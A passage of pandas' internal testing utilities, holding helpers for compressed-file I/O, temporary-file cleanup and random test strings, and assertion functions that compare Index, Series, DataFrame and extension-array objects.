IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
LocalPath = pytest.importorskip("py.path").local
if path is None:
path = "___localpath___"
with ensure_clean(path) as path:
writer(LocalPath(path))
obj = reader(LocalPath(path))
return obj
@contextmanager
def decompress_file(path, compression):
"""
Open a compressed file and return a file object.
Parameters
----------
path : str
The path where the file is read from.
compression : {'gzip', 'bz2', 'zip', 'xz', None}
Name of the decompression to use
Returns
-------
file object
"""
if compression is None:
f = open(path, "rb")
elif compression == "gzip":
f = gzip.open(path, "rb")
elif compression == "bz2":
f = bz2.BZ2File(path, "rb")
elif compression == "xz":
f = _get_lzma_file(lzma)(path, "rb")
elif compression == "zip":
zip_file = zipfile.ZipFile(path)
zip_names = zip_file.namelist()
if len(zip_names) == 1:
f = zip_file.open(zip_names.pop())
else:
raise ValueError(f"ZIP file {path} error. Only one file per ZIP.")
else:
raise ValueError(f"Unrecognized compression type: {compression}")
try:
yield f
finally:
f.close()
if compression == "zip":
zip_file.close()
def write_to_compressed(compression, path, data, dest="test"):
"""
Write data to a compressed file.
Parameters
----------
compression : {'gzip', 'bz2', 'zip', 'xz'}
The compression type to use.
path : str
The file path to write the data.
data : str
The data to write.
dest : str, default "test"
The destination file (for ZIP only)
Raises
------
ValueError : An invalid compression value was passed in.
"""
if compression == "zip":
import zipfile
compress_method = zipfile.ZipFile
elif compression == "gzip":
import gzip
compress_method = gzip.GzipFile
elif compression == "bz2":
import bz2
compress_method = bz2.BZ2File
elif compression == "xz":
compress_method = _get_lzma_file(lzma)
else:
raise ValueError(f"Unrecognized compression type: {compression}")
if compression == "zip":
mode = "w"
args = (dest, data)
method = "writestr"
else:
mode = "wb"
args = (data,)
method = "write"
with compress_method(path, mode=mode) as f:
getattr(f, method)(*args)
def assert_almost_equal(
left,
right,
check_dtype: Union[bool, str] = "equiv",
check_less_precise: Union[bool, int] = False,
**kwargs,
):
"""
Check that the left and right objects are approximately equal.
By approximately equal, we refer to objects that are numbers or that
contain numbers which may be equivalent to specific levels of precision.
Parameters
----------
left : object
right : object
check_dtype : bool or {'equiv'}, default 'equiv'
Check dtype if both a and b are the same type. If 'equiv' is passed in,
then `RangeIndex` and `Int64Index` are also considered equivalent
when doing type checking.
check_less_precise : bool or int, default False
Specify comparison precision. 5 digits (False) or 3 digits (True)
after decimal points are compared. If int, then specify the number
of digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
"""
if isinstance(left, pd.Index):
assert_index_equal(
left,
right,
check_exact=False,
exact=check_dtype,
check_less_precise=check_less_precise,
**kwargs,
)
elif isinstance(left, pd.Series):
assert_series_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs,
)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs,
)
else:
# Other sequences.
if check_dtype:
if is_number(left) and is_number(right):
# Do not compare numeric classes, like np.float64 and float.
pass
elif is_bool(left) and is_bool(right):
# Do not compare bool classes, like np.bool_ and bool.
pass
else:
if isinstance(left, np.ndarray) or isinstance(right, np.ndarray):
obj = "numpy array"
else:
obj = "Input"
assert_class_equal(left, right, obj=obj)
_testing.assert_almost_equal(
left,
right,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs,
)
def _check_isinstance(left, right, cls):
"""
Helper method for our assert_* methods that ensures that
the two objects being compared have the right type before
proceeding with the comparison.
Parameters
----------
left : The first object being compared.
right : The second object being compared.
cls : The class type to check against.
Raises
------
AssertionError : Either `left` or `right` is not an instance of `cls`.
"""
cls_name = cls.__name__
if not isinstance(left, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(left)} instead"
)
if not isinstance(right, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(right)} instead"
)
def assert_dict_equal(left, right, compare_keys: bool = True):
_check_isinstance(left, right, dict)
_testing.assert_dict_equal(left, right, compare_keys=compare_keys)
def randbool(size=(), p: float = 0.5):
return rand(*size) <= p
RANDS_CHARS = np.array(list(string.ascii_letters + string.digits), dtype=(np.str_, 1))
RANDU_CHARS = np.array(
list("".join(map(chr, range(1488, 1488 + 26))) + string.digits),
dtype=(np.unicode_, 1),
)
def rands_array(nchars, size, dtype="O"):
"""
Generate an array of byte strings.
"""
retval = (
np.random.choice(RANDS_CHARS, size=nchars * np.prod(size))
.view((np.str_, nchars))
.reshape(size)
)
if dtype is None:
return retval
else:
return retval.astype(dtype)
def randu_array(nchars, size, dtype="O"):
"""
Generate an array of unicode strings.
"""
retval = (
np.random.choice(RANDU_CHARS, size=nchars * np.prod(size))
.view((np.unicode_, nchars))
.reshape(size)
)
if dtype is None:
return retval
else:
return retval.astype(dtype)
def rands(nchars):
"""
Generate one random byte string.
See `rands_array` if you want to create an array of random strings.
"""
return "".join(np.random.choice(RANDS_CHARS, nchars))
def randu(nchars):
"""
Generate one random unicode string.
See `randu_array` if you want to create an array of random unicode strings.
"""
return "".join(np.random.choice(RANDU_CHARS, nchars))
def close(fignum=None):
from matplotlib.pyplot import get_fignums, close as _close
if fignum is None:
for fignum in get_fignums():
_close(fignum)
else:
_close(fignum)
# -----------------------------------------------------------------------------
# contextmanager to ensure the file cleanup
@contextmanager
def ensure_clean(filename=None, return_filelike=False, **kwargs):
"""
Gets a temporary path and agrees to remove on close.
Parameters
----------
filename : str (optional)
if None, creates a temporary file which is then removed when out of
scope. if passed, creates temporary file with filename as ending.
return_filelike : bool (default False)
if True, returns a file-like which is *always* cleaned. Necessary for
savefig and other functions which want to append extensions.
**kwargs
Additional keywords passed in for creating a temporary file.
:meth:`tempFile.TemporaryFile` is used when `return_filelike` is ``True``.
:meth:`tempfile.mkstemp` is used when `return_filelike` is ``False``.
Note that the `filename` parameter will be passed in as the `suffix`
argument to either function.
See Also
--------
tempfile.TemporaryFile
tempfile.mkstemp
"""
filename = filename or ""
fd = None
kwargs["suffix"] = filename
if return_filelike:
f = tempfile.TemporaryFile(**kwargs)
try:
yield f
finally:
f.close()
else:
# Don't generate tempfile if using a path with directory specified.
if len(os.path.dirname(filename)):
raise ValueError("Can't pass a qualified name to ensure_clean()")
try:
fd, filename = tempfile.mkstemp(**kwargs)
except UnicodeEncodeError:
import pytest
pytest.skip("no unicode file names on this system")
try:
yield filename
finally:
try:
os.close(fd)
except OSError:
print(f"Couldn't close file descriptor: {fd} (file: {filename})")
try:
if os.path.exists(filename):
os.remove(filename)
except OSError as e:
print(f"Exception on removing file: {e}")
@contextmanager
def ensure_clean_dir():
"""
Get a temporary directory path and agrees to remove on close.
Yields
------
Temporary directory path
"""
directory_name = tempfile.mkdtemp(suffix="")
try:
yield directory_name
finally:
try:
rmtree(directory_name)
except OSError:
pass
@contextmanager
def ensure_safe_environment_variables():
"""
Get a context manager to safely set environment variables
All changes will be undone on close, hence environment variables set
within this contextmanager will neither persist nor change global state.
"""
saved_environ = dict(os.environ)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
"""
Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def assert_index_equal(
left: Index,
right: Index,
exact: Union[bool, str] = "equiv",
check_names: bool = True,
check_less_precise: Union[bool, int] = False,
check_exact: bool = True,
check_categorical: bool = True,
obj: str = "Index",
) -> None:
"""
Check that left and right Index are equal.
Parameters
----------
left : Index
right : Index
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
check_names : bool, default True
Whether to check the names attribute.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
check_exact : bool, default True
Whether to compare number exactly.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
obj : str, default 'Index'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
def _check_types(l, r, obj="Index"):
if exact:
assert_class_equal(l, r, exact=exact, obj=obj)
# Skip exact dtype checking when `check_categorical` is False
if check_categorical:
assert_attr_equal("dtype", l, r, obj=obj)
# allow string-like to have different inferred_types
if l.inferred_type in ("string"):
assert r.inferred_type in ("string")
else:
assert_attr_equal("inferred_type", l, r, obj=obj)
def _get_ilevel_values(index, level):
# accept level number only
unique = index.levels[level]
level_codes = index.codes[level]
filled = take_1d(unique._values, level_codes, fill_value=unique._na_value)
values = unique._shallow_copy(filled, name=index.names[level])
return values
# instance validation
_check_isinstance(left, right, Index)
# class / dtype comparison
_check_types(left, right, obj=obj)
# level comparison
if left.nlevels != right.nlevels:
msg1 = f"{obj} levels are different"
msg2 = f"{left.nlevels}, {left}"
msg3 = f"{right.nlevels}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# length comparison
if len(left) != len(right):
msg1 = f"{obj} length are different"
msg2 = f"{len(left)}, {left}"
msg3 = f"{len(right)}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# MultiIndex special comparison for little-friendly error messages
if left.nlevels > 1:
left = cast(MultiIndex, left)
right = cast(MultiIndex, right)
for level in range(left.nlevels):
# cannot use get_level_values here because it can change dtype
llevel = _get_ilevel_values(left, level)
rlevel = _get_ilevel_values(right, level)
lobj = f"MultiIndex level [{level}]"
assert_index_equal(
llevel,
rlevel,
exact=exact,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
obj=lobj,
)
# get_level_values may change dtype
_check_types(left.levels[level], right.levels[level], obj=obj)
# skip exact index checking when `check_categorical` is False
if check_exact and check_categorical:
if not left.equals(right):
diff = np.sum((left.values != right.values).astype(int)) * 100.0 / len(left)
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right)
else:
_testing.assert_almost_equal(
left.values,
right.values,
check_less_precise=check_less_precise,
check_dtype=exact,
obj=obj,
lobj=left,
robj=right,
)
# metadata comparison
if check_names:
assert_attr_equal("names", left, right, obj=obj)
if isinstance(left, pd.PeriodIndex) or isinstance(right, pd.PeriodIndex):
assert_attr_equal("freq", left, right, obj=obj)
if isinstance(left, pd.IntervalIndex) or isinstance(right, pd.IntervalIndex):
assert_interval_array_equal(left.values, right.values)
if check_categorical:
if is_categorical_dtype(left) or is_categorical_dtype(right):
assert_categorical_equal(left.values, right.values, obj=f"{obj} category")
def assert_class_equal(left, right, exact: Union[bool, str] = True, obj="Input"):
"""
Checks classes are equal.
"""
__tracebackhide__ = True
def repr_class(x):
if isinstance(x, Index):
# return Index as it is to include values in the error message
return x
try:
return type(x).__name__
except AttributeError:
return repr(type(x))
if exact == "equiv":
if type(left) != type(right):
# allow equivalence of Int64Index/RangeIndex
types = {type(left).__name__, type(right).__name__}
if len(types - {"Int64Index", "RangeIndex"}):
msg = f"{obj} classes are not equivalent"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
elif exact:
if type(left) != type(right):
msg = f"{obj} classes are different"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
def assert_attr_equal(attr, left, right, obj="Attributes"):
"""checks attributes are equal. Both objects must have attribute.
Parameters
----------
attr : str
Attribute name being compared.
left : object
right : object
obj : str, default 'Attributes'
Specify object name being compared, internally used to show appropriate
assertion message
"""
__tracebackhide__ = True
left_attr = getattr(left, attr)
right_attr = getattr(right, attr)
if left_attr is right_attr:
return True
elif (
is_number(left_attr)
and np.isnan(left_attr)
and is_number(right_attr)
and np.isnan(right_attr)
):
# np.nan
return True
try:
result = left_attr == right_attr
except TypeError:
# datetimetz on rhs may raise TypeError
result = False
if not isinstance(result, bool):
result = result.all()
if result:
return True
else:
msg = f'Attribute "{attr}" are different'
raise_assert_detail(obj, msg, left_attr, right_attr)
def assert_is_valid_plot_return_object(objs):
import matplotlib.pyplot as plt
if isinstance(objs, (pd.Series, np.ndarray)):
for el in objs.ravel():
msg = (
"one of 'objs' is not a matplotlib Axes instance, "
f"type encountered {repr(type(el).__name__)}"
)
assert isinstance(el, (plt.Axes, dict)), msg
else:
msg = (
"objs is neither an ndarray of Artist instances nor a single "
"ArtistArtist instance, tuple, or dict, 'objs' is a "
f"{repr(type(objs).__name__)}"
)
assert isinstance(objs, (plt.Artist, tuple, dict)), msg
def isiterable(obj):
return hasattr(obj, "__iter__")
def assert_is_sorted(seq):
"""Assert that the sequence is sorted."""
if isinstance(seq, (Index, Series)):
seq = seq.values
# sorting does not change precisions
assert_numpy_array_equal(seq, np.sort(np.array(seq)))
def assert_categorical_equal(
left, right, check_dtype=True, check_category_order=True, obj="Categorical"
):
"""Test that Categoricals are equivalent.
Parameters
----------
left : Categorical
right : Categorical
check_dtype : bool, default True
Check that integer dtype of the codes are the same
check_category_order : bool, default True
Whether the order of the categories should be compared, which
implies identical integer codes. If False, only the resulting
values are compared. The ordered attribute is
checked regardless.
obj : str, default 'Categorical'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, Categorical)
if check_category_order:
assert_index_equal(left.categories, right.categories, obj=f"{obj}.categories")
assert_numpy_array_equal(
left.codes, right.codes, check_dtype=check_dtype, obj=f"{obj}.codes",
)
else:
assert_index_equal(
left.categories.sort_values(),
right.categories.sort_values(),
obj=f"{obj}.categories",
)
assert_index_equal(
left.categories.take(left.codes),
right.categories.take(right.codes),
obj=f"{obj}.values",
)
assert_attr_equal("ordered", left, right, obj=obj)
def assert_interval_array_equal(left, right, exact="equiv", obj="IntervalArray"):
"""Test that two IntervalArrays are equivalent.
Parameters
----------
left, right : IntervalArray
The IntervalArrays to compare.
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
obj : str, default 'IntervalArray'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, IntervalArray)
assert_index_equal(left.left, right.left, exact=exact, obj=f"{obj}.left")
assert_index_equal(left.right, right.right, exact=exact, obj=f"{obj}.left")
assert_attr_equal("closed", left, right, obj=obj)
def assert_period_array_equal(left, right, obj="PeriodArray"):
_check_isinstance(left, right, PeriodArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}.values")
assert_attr_equal("freq", left, right, obj=obj)
def assert_datetime_array_equal(left, right, obj="DatetimeArray"):
__tracebackhide__ = True
_check_isinstance(left, right, DatetimeArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
assert_attr_equal("tz", left, right, obj=obj)
def assert_timedelta_array_equal(left, right, obj="TimedeltaArray"):
__tracebackhide__ = True
_check_isinstance(left, right, TimedeltaArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
def raise_assert_detail(obj, message, left, right, diff=None):
__tracebackhide__ = True
if isinstance(left, np.ndarray):
left = pprint_thing(left)
elif is_categorical_dtype(left):
left = repr(left)
if isinstance(right, np.ndarray):
right = pprint_thing(right)
elif is_categorical_dtype(right):
right = repr(right)
msg = f"""{obj} are different
{message}
[left]: {left}
[right]: {right}"""
if diff is not None:
msg += f"\n[diff]: {diff}"
raise AssertionError(msg)
def assert_numpy_array_equal(
left,
right,
strict_nan=False,
check_dtype=True,
err_msg=None,
check_same=None,
obj="numpy array",
):
"""
Check that 'np.ndarray' is equivalent.
Parameters
----------
left, right : numpy.ndarray or iterable
The two arrays to be compared.
strict_nan : bool, default False
If True, consider NaN and None to be different.
check_dtype : bool, default True
Check dtype if both a and b are np.ndarray.
err_msg : str, default None
If provided, used as assertion message.
check_same : None|'copy'|'same', default None
Ensure left and right refer/do not refer to the same memory area.
obj : str, default 'numpy array'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
# instance validation
# Show a detailed error message when classes are different
assert_class_equal(left, right, obj=obj)
# both classes must be an np.ndarray
_check_isinstance(left, right, np.ndarray)
def _get_base(obj):
return obj.base if getattr(obj, "base", None) is not None else obj
left_base = _get_base(left)
right_base = _get_base(right)
if check_same == "same":
if left_base is not right_base:
raise AssertionError(f"{repr(left_base)} is not {repr(right_base)}")
elif check_same == "copy":
if left_base is right_base:
raise AssertionError(f"{repr(left_base)} is {repr(right_base)}")
def _raise(left, right, err_msg):
if err_msg is None:
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shapes are different", left.shape, right.shape,
)
diff = 0
for l, r in zip(left, right):
# count up differences
if not array_equivalent(l, r, strict_nan=strict_nan):
diff += 1
diff = diff * 100.0 / left.size
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right)
raise AssertionError(err_msg)
# compare shape and values
if not array_equivalent(left, right, strict_nan=strict_nan):
_raise(left, right, err_msg)
if check_dtype:
if isinstance(left, np.ndarray) and isinstance(right, np.ndarray):
assert_attr_equal("dtype", left, right, obj=obj)
def assert_extension_array_equal(
left, right, check_dtype=True, check_less_precise=False, check_exact=False
):
"""Check that left and right ExtensionArrays are equal.
Parameters
----------
left, right : ExtensionArray
The two arrays to compare.
check_dtype : bool, default True
Whether to check if the ExtensionArray dtypes are identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
check_exact : bool, default False
Whether to compare number exactly.
Notes
-----
Missing values are checked separately from valid values.
A mask of missing values is computed for each and checked to match.
The remaining all-valid values are cast to object dtype and checked.
"""
assert isinstance(left, ExtensionArray), "left is not an ExtensionArray"
assert isinstance(right, ExtensionArray), "right is not an ExtensionArray"
if check_dtype:
assert_attr_equal("dtype", left, right, obj="ExtensionArray")
if hasattr(left, "asi8") and type(right) == type(left):
# Avoid slow object-dtype comparisons
assert_numpy_array_equal(left.asi8, right.asi8)
return
left_na = np.asarray(left.isna())
right_na = np.asarray(right.isna())
assert_numpy_array_equal(left_na, right_na, obj="ExtensionArray NA mask")
left_valid = np.asarray(left[~left_na].astype(object))
right_valid = np.asarray(right[~right_na].astype(object))
if check_exact:
assert_numpy_array_equal(left_valid, right_valid, obj="ExtensionArray")
else:
_testing.assert_almost_equal(
left_valid,
right_valid,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
obj="ExtensionArray",
)
# This could be refactored to use the NDFrame.equals method
def assert_series_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_series_type=True,
check_less_precise=False,
check_names=True,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
obj="Series",
):
"""
Check that left and right Series are equal.
Parameters
----------
left : Series
right : Series
check_dtype : bool, default True
Whether to check the Series dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_series_type : bool, default True
Whether to check the Series class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
check_names : bool, default True
Whether to check the Series and Index names attribute.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
obj : str, default 'Series'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
# instance validation
_check_isinstance(left, right, Series)
if check_series_type:
# ToDo: There are some tests using rhs is sparse
# lhs is dense. Should use assert_class_equal in future
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# length comparison
if len(left) != len(right):
msg1 = f"{len(left)}, {left.index}"
msg2 = f"{len(right)}, {right.index}"
raise_assert_detail(obj, "Series length are different", msg1, msg2)
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj=f"{obj}.index",
)
if check_dtype:
# We want to skip exact dtype checking when `check_categorical`
# is False. We'll still raise if only one is a `Categorical`,
# regardless of `check_categorical`
if (
is_categorical_dtype(left)
and is_categorical_dtype(right)
and not check_categorical
):
pass
else:
assert_attr_equal("dtype", left, right, obj=f"Attributes of {obj}")
if check_exact:
assert_numpy_array_equal(
left._internal_get_values(),
right._internal_get_values(),
check_dtype=check_dtype,
obj=str(obj),
)
elif check_datetimelike_compat:
# we want to check only if we have compat dtypes
# e.g. integer and M|m are NOT compat, but we can simply check
# the values in that case
if needs_i8_conversion(left) or needs_i8_conversion(right):
# datetimelike may have different objects (e.g. datetime.datetime
# vs Timestamp) but will compare equal
if not Index(left.values).equals(Index(right.values)):
msg = (
f"[datetimelike_compat=True] {left.values} "
f"is not equal to {right.values}."
)
raise AssertionError(msg)
else:
assert_numpy_array_equal(
left._internal_get_values(),
right._internal_get_values(),
check_dtype=check_dtype,
)
elif is_interval_dtype(left) or is_interval_dtype(right):
assert_interval_array_equal(left.array, right.array)
elif is_extension_array_dtype(left.dtype) and is_datetime64tz_dtype(left.dtype):
# .values is an ndarray, but ._values is the ExtensionArray.
# TODO: Use .array
assert is_extension_array_dtype(right.dtype)
assert_extension_array_equal(left._values, right._values)
elif (
is_extension_array_dtype(left)
and not is_categorical_dtype(left)
and is_extension_array_dtype(right)
and not is_categorical_dtype(right)
):
assert_extension_array_equal(left.array, right.array)
else:
_testing.assert_almost_equal(
left._internal_get_values(),
right._internal_get_values(),
check_less_precise=check_less_precise,
check_dtype=check_dtype,
obj=str(obj),
)
# metadata comparison
if check_names:
assert_attr_equal("name", left, right, obj=obj)
if check_categorical:
if is_categorical_dtype(left) or is_categorical_dtype(right):
assert_categorical_equal(left.values, right.values, obj=f"{obj} category")
# This could be refactored to use the NDFrame.equals method
def assert_frame_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_column_type="equiv",
check_frame_type=True,
check_less_precise=False,
check_names=True,
by_blocks=False,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_like=False,
obj="DataFrame",
):
"""
Check that left and right DataFrame are equal.
This function is intended to compare two DataFrames and output any
differences. Is is mostly intended for use in unit tests.
Additional parameters allow varying the strictness of the
equality checks performed.
Parameters
----------
left : DataFrame
First DataFrame to compare.
right : DataFrame
Second DataFrame to compare.
check_dtype : bool, default True
Whether to check the DataFrame dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_column_type : bool or {'equiv'}, default 'equiv'
Whether to check the columns class, dtype and inferred_type
are identical. Is passed as the ``exact`` argument of
:func:`assert_index_equal`.
check_frame_type : bool, default True
Whether to check the DataFrame class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
check_names : bool, default True
Whether to check that the `names` attribute for both the `index`
and `column` attributes of the DataFrame is identical.
by_blocks : bool, default False
Specify how to compare internal data. If False, compare by columns.
If True, compare by blocks.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_like : bool, default False
If True, ignore the order of index & columns.
Note: index labels must match their respective rows
(same as in columns) - same labels must be with the same data.
obj : str, default 'DataFrame'
Specify object name being compared, internally used to show appropriate
assertion message.
See Also
--------
assert_series_equal : Equivalent method for asserting Series equality.
DataFrame.equals : Check DataFrame equality.
Examples
--------
This example shows comparing two DataFrames that are equal
but with columns of differing dtypes.
>>> from pandas._testing import assert_frame_equal
>>> df1 = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
>>> df2 = pd.DataFrame({'a': [1, 2], 'b': [3.0, 4.0]})
df1 equals itself.
>>> assert_frame_equal(df1, df1)
df1 differs from df2 as column 'b' is of a different type.
>>> assert_frame_equal(df1, df2)
Traceback (most recent call last):
...
AssertionError: Attributes of DataFrame.iloc[:, 1] (column name="b") are different
Attribute "dtype" are different
[left]: int64
[right]: float64
Ignore differing dtypes in columns with check_dtype.
>>> assert_frame_equal(df1, df2, check_dtype=False)
"""
__tracebackhide__ = True
# instance validation
_check_isinstance(left, right, DataFrame)
if check_frame_type:
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# shape comparison
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shape mismatch", f"{repr(left.shape)}", f"{repr(right.shape)}",
)
if check_like:
left, right = left.reindex_like(right), right
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj=f"{obj}.index",
)
# column comparison
assert_index_equal(
left.columns,
right.columns,
exact=check_column_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj=f"{obj}.columns",
)
# compare by blocks
if by_blocks:
rblocks = right._to_dict_of_blocks()
lblocks = left._to_dict_of_blocks()
for dtype in list(set(list(lblocks.keys()) + list(rblocks.keys()))):
assert dtype in lblocks
assert dtype in rblocks
assert_frame_equal(
lblocks[dtype], rblocks[dtype], check_dtype=check_dtype, obj=obj
)
# compare by columns
else:
for i, col in enumerate(left.columns):
assert col in right
lcol = left.iloc[:, i]
rcol = right.iloc[:, i]
assert_series_equal(
lcol,
rcol,
check_dtype=check_dtype,
check_index_type=check_index_type,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_names=check_names,
check_datetimelike_compat=check_datetimelike_compat,
check_categorical=check_categorical,
obj=f'{obj}.iloc[:, {i}] (column name="{col}")',
)
def assert_equal(left, right, **kwargs):
"""
Wrapper for tm.assert_*_equal to dispatch to the appropriate test function.
Parameters
----------
left, right : Index, Series, DataFrame, ExtensionArray, or np.ndarray
The two items to be compared.
**kwargs
All keyword arguments are passed through to the underlying assert method.
"""
__tracebackhide__ = True
if isinstance(left, pd.Index):
assert_index_equal(left, right, **kwargs)
elif isinstance(left, pd.Series):
assert_series_equal(left, right, **kwargs)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(left, right, **kwargs)
elif isinstance(left, IntervalArray):
assert_interval_array_equal(left, right, **kwargs)
elif isinstance(left, PeriodArray):
assert_period_array_equal(left, right, **kwargs)
elif isinstance(left, DatetimeArray):
assert_datetime_array_equal(left, right, **kwargs)
elif isinstance(left, TimedeltaArray):
assert_timedelta_array_equal(left, right, **kwargs)
elif isinstance(left, ExtensionArray):
assert_extension_array_equal(left, right, **kwargs)
elif isinstance(left, np.ndarray):
assert_numpy_array_equal(left, right, **kwargs)
elif isinstance(left, str):
assert kwargs == {}
assert left == right
else:
raise NotImplementedError(type(left))
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.Index:
expected = pd.Index(expected)
elif box_cls is pd.Series:
expected = pd.Series(expected)
elif box_cls is pd.DataFrame:
expected = pd.Series(expected).to_frame()
if transpose:
# for vector operations, we we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length.
expected = expected.T
elif box_cls is PeriodArray:
# the PeriodArray constructor is not as flexible as period_array
expected = period_array(expected)
elif box_cls is DatetimeArray:
expected = DatetimeArray(expected)
elif box_cls is TimedeltaArray:
expected = TimedeltaArray(expected)
elif box_cls is np.ndarray:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
def to_array(obj):
# temporary implementation until we get pd.array in place
if is_period_dtype(obj):
return period_array(obj)
elif is_datetime64_dtype(obj) or is_datetime64tz_dtype(obj):
return DatetimeArray._from_sequence(obj)
elif is_timedelta64_dtype(obj):
return TimedeltaArray._from_sequence(obj)
else:
return np.array(obj)
# -----------------------------------------------------------------------------
# Sparse
def assert_sp_array_equal(
left,
right,
check_dtype=True,
check_kind=True,
check_fill_value=True,
consolidate_block_indices=False,
):
"""Check that the left and right SparseArray are equal.
Parameters
----------
left : SparseArray
right : SparseArray
check_dtype : bool, default True
Whether to check the data dtype is identical.
check_kind : bool, default True
Whether to just the kind of the sparse index for each column.
check_fill_value : bool, default True
Whether to check that left.fill_value matches right.fill_value
consolidate_block_indices : bool, default False
Whether to consolidate contiguous blocks for sparse arrays with
a BlockIndex. Some operations, e.g. concat, will end up with
block indices that could be consolidated. Setting this to true will
create a new BlockIndex for that array, with consolidated
block indices.
"""
_check_isinstance(left, right, pd.arrays.SparseArray)
assert_numpy_array_equal(left.sp_values, right.sp_values, check_dtype=check_dtype)
# SparseIndex comparison
assert isinstance(left.sp_index, pd._libs.sparse.SparseIndex)
assert isinstance(right.sp_index, pd._libs.sparse.SparseIndex)
if not check_kind:
left_index = left.sp_index.to_block_index()
right_index = right.sp_index.to_block_index()
else:
left_index = left.sp_index
right_index = right.sp_index
if consolidate_block_indices and left.kind == "block":
# we'll probably remove this hack...
left_index = left_index.to_int_index().to_block_index()
right_index = right_index.to_int_index().to_block_index()
if not left_index.equals(right_index):
raise_assert_detail(
"SparseArray.index", "index are not equal", left_index, right_index
)
else:
